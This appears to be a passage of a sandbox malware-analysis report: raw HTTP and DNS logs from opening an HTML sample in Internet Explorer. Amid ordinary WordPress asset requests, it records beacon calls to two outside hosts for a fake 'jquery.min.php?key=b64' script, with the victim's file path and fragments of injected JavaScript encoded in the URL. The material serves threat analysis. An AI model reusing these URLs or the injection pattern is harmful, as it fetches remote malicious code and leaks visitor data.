User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 123
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/app.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/defaults.css?ver=1.0 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/select2.css?ver=3.5.1 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 136
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/js/isotope.pkgd.min.js?ver=v2.0.0IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/isotope.pkgd.min.js?ver=v2.0.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 125
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/select2.min.js?ver=3.5.1 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/imagesloaded.js?ver=v3.1.4 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 125
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/themes/mrtailor/css/idangerous.swiper.css?ver=2.5.1IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/idangerous.swiper.css?ver=2.5.1 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/owl.carousel.css?ver=1.3.1 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/css/nanoscroller.css?ver=0.7.6 HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
GEThttp://anatomiteca.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.0.6IEXPLORE.EXERemote address:13.248.169.48:80RequestGET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.0.6 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:45 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/owl.carousel.min.js?ver=1.3.1 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 124
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/themes/mrtailor/js/scripts.js?ver=1.0 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 122
Connection: keep-alive
-
Remote address:13.248.169.48:80RequestGET /wp-content/uploads/2015/10/logo.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: anatomiteca.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Mon, 27 May 2024 19:54:46 GMT
Content-Type: text/html
Content-Length: 114
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestcovenant.com.myIN AResponsecovenant.com.myIN A202.73.12.212
-
GEThttp://covenant.com.my/js/jquery.min.php?key=b64&utm_campaign=I92930&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=IEXPLORE.EXERemote address:202.73.12.212:80RequestGET /js/jquery.min.php?key=b64&utm_campaign=I92930&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer= HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: covenant.com.my
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://covenant.com.my/wp-json/>; rel="https://api.w.org/"
Keep-Alive: timeout=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestgiancarlobronzetti.itIN AResponsegiancarlobronzetti.itIN A149.3.144.211
-
GEThttp://giancarlobronzetti.it/js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=IEXPLORE.EXERemote address:149.3.144.211:80RequestGET /js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer= HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: giancarlobronzetti.it
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: User-Agent
Content-Encoding: gzip
-
Remote address:216.58.215.42:80RequestGET /css?family=Raleway HTTP/1.1
Accept: text/css, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: fonts.googleapis.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 27 May 2024 19:54:52 GMT
Date: Mon, 27 May 2024 19:54:52 GMT
Cache-Control: private, max-age=86400
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin-allow-popups
Content-Encoding: gzip
Transfer-Encoding: chunked
Server: ESF
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
-
GEThttp://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc.woffIEXPLORE.EXERemote address:216.58.214.67:80RequestGET /s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc.woff HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Origin: file:
Accept-Encoding: gzip, deflate
Host: fonts.gstatic.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="apps-themes"
Report-To: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
Timing-Allow-Origin: *
Content-Length: 27488
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Thu, 23 May 2024 17:36:04 GMT
Expires: Fri, 23 May 2025 17:36:04 GMT
Cache-Control: public, max-age=31536000
Age: 353928
Last-Modified: Wed, 01 May 2024 20:31:55 GMT
Content-Type: font/woff
-
756 B 5.1kB 10 9
-
216.58.214.74:443https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.jstls, httpIEXPLORE.EXE1.2kB 13.3kB 13 15
HTTP Request
GET https://ajax.googleapis.com/ajax/libs/webfont/1.5.3/webfont.jsHTTP Response
200 -
13.248.169.48:80http://anatomiteca.com/wp-content/themes/mrtailor/js/idangerous.swiper.min.js?ver=2.6.1httpIEXPLORE.EXE3.0kB 2.6kB 13 12
HTTP Request
GET http://anatomiteca.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.0.6HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/easyzoom.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/offcanvas.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/inc/fonts/getbowtied-fonts/style.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.0.6HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.nanoscroller.min.js?ver=0.7.6HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.snapscroll.min.js?ver=1.6.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/idangerous.swiper.min.js?ver=2.6.1HTTP Response
200 -
13.248.169.48:80http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.fitvids.js?ver=1.0.3httpIEXPLORE.EXE3.0kB 2.7kB 14 13
HTTP Request
GET http://anatomiteca.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-includes/js/wp-emoji-release.min.js?ver=4.2.15HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/owl.theme.css?ver=1.3.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-includes/js/jquery/jquery.js?ver=1.11.2HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/fresco.js?ver=1.3.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.stellar.min.js?ver=0.6.2HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.fitvids.js?ver=1.0.3HTTP Response
200 -
13.248.169.48:80http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.touchSwipe.min.js?ver=1.6.5httpIEXPLORE.EXE2.9kB 2.6kB 13 12
HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/animate.min.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/fresco/fresco.css?ver=1.3.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/styles.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/inc/fonts/font-awesome/css/font-awesome.min.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/modernizr.custom.js?ver=2.6.3HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/foundation.interchange.js?ver=5.2.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.scroll_to.js?ver=1.4.5HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/jquery.touchSwipe.min.js?ver=1.6.5HTTP Response
200 -
13.248.169.48:80http://anatomiteca.com/wp-content/themes/mrtailor/images/error_404.pnghttpIEXPLORE.EXE2.9kB 2.6kB 13 12
HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/animations-products-grid.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/woocommerce-overwrite.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/responsive.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/style.css?ver=4.2.15HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/plugins/js_composer/assets/js/vendors/woocommerce-add-to-cart.js?ver=4.7HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/foundation.min.js?ver=5.2.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/easyzoom.js?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/images/error_404.pngHTTP Response
200 -
13.248.169.48:80http://anatomiteca.com/wp-content/themes/mrtailor/js/imagesloaded.js?ver=v3.1.4httpIEXPLORE.EXE2.9kB 2.7kB 13 12
HTTP Request
GET http://anatomiteca.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/app.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/defaults.css?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/select2.css?ver=3.5.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/isotope.pkgd.min.js?ver=v2.0.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/select2.min.js?ver=3.5.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/imagesloaded.js?ver=v3.1.4HTTP Response
200 -
2.9kB 2.6kB 13 12
HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/idangerous.swiper.css?ver=2.5.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/owl.carousel.css?ver=1.3.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/css/nanoscroller.css?ver=0.7.6HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.0.6HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/owl.carousel.min.js?ver=1.3.1HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/themes/mrtailor/js/scripts.js?ver=1.0HTTP Response
200HTTP Request
GET http://anatomiteca.com/wp-content/uploads/2015/10/logo.pngHTTP Response
200 -
202.73.12.212:80http://covenant.com.my/js/jquery.min.php?key=b64&utm_campaign=I92930&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=httpIEXPLORE.EXE1.7kB 12.0kB 11 12
HTTP Request
GET http://covenant.com.my/js/jquery.min.php?key=b64&utm_campaign=I92930&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=HTTP Response
404 -
472 B 144 B 10 3
-
466 B 92 B 10 2
-
149.3.144.211:80http://giancarlobronzetti.it/js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=httpIEXPLORE.EXE1.4kB 1.3kB 5 3
HTTP Request
GET http://giancarlobronzetti.it/js/jquery.min.php?key=b64&utm_campaign=snt2014&utm_source=&utm_medium=&utm_content=file:///C:/Users/Admin/AppData/Local/Temp/7a5374345893ba13875add636485c8c0_JaffaCakes118.html&utm_term=Nothing%20found%20for%20Producto%20The%20Gift%20Of%20Reading%20In%202011%20%2520%2B%2520Http%3A%20Www%20Din27001%20De%20Js%20Jquery%20Min%20Php%2520%2B%3Fkey%3DB64%2520%2B%2520%26utm_Campaign%3D%2520%2B%2520Snt2014%2520%2B%2520%26utm_Source%3D%2520%2B%2520Window%20Location%20Host%2520%2B%2520%26utm_Medium%3D%2520%2B%2520%26utm_Content%3D%2520%2B%2520Window%20Location%2520%2B%2520%26utm_Term%3D%2520%2B%2520Encodeuricomponent(((K%3D(Function()%257Bvar%2520Keywords%2520%3D%2520%3Bvar%2520Metas%2520%3D%2520Document%20Getelementsbytagname(Meta)%3Bif%2520(Metas)%2520%257Bfor%2520(Var%2520X%3D0%2Cy%3DMetas%20Length%3B%2520X%253Cy%3B%2520X%2B%2B)%2520%257Bif%2520(Metas%5BX%5D%20Name%20Tolowercase()%2520%3D%3D&se_referrer=HTTP Response
404 -
190 B 92 B 4 2
-
525 B 890 B 6 5
HTTP Request
GET http://fonts.googleapis.com/css?family=RalewayHTTP Response
200 -
216.58.214.67:80http://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc.woffhttpIEXPLORE.EXE1.1kB 29.2kB 17 24
HTTP Request
GET http://fonts.gstatic.com/s/raleway/v34/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaorCIPrc.woffHTTP Response
200 -
190 B 92 B 4 2
-
799 B 7.7kB 10 13
-
799 B 7.7kB 10 13
-
785 B 7.7kB 9 13
-
65 B 81 B 1 1
DNS Request
ajax.googleapis.com
DNS Response
216.58.214.74
-
61 B 93 B 1 1
DNS Request
anatomiteca.com
DNS Response
13.248.169.4876.223.54.146
-
61 B 77 B 1 1
DNS Request
covenant.com.my
DNS Response
202.73.12.212
-
67 B 83 B 1 1
DNS Request
giancarlobronzetti.it
DNS Response
149.3.144.211
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
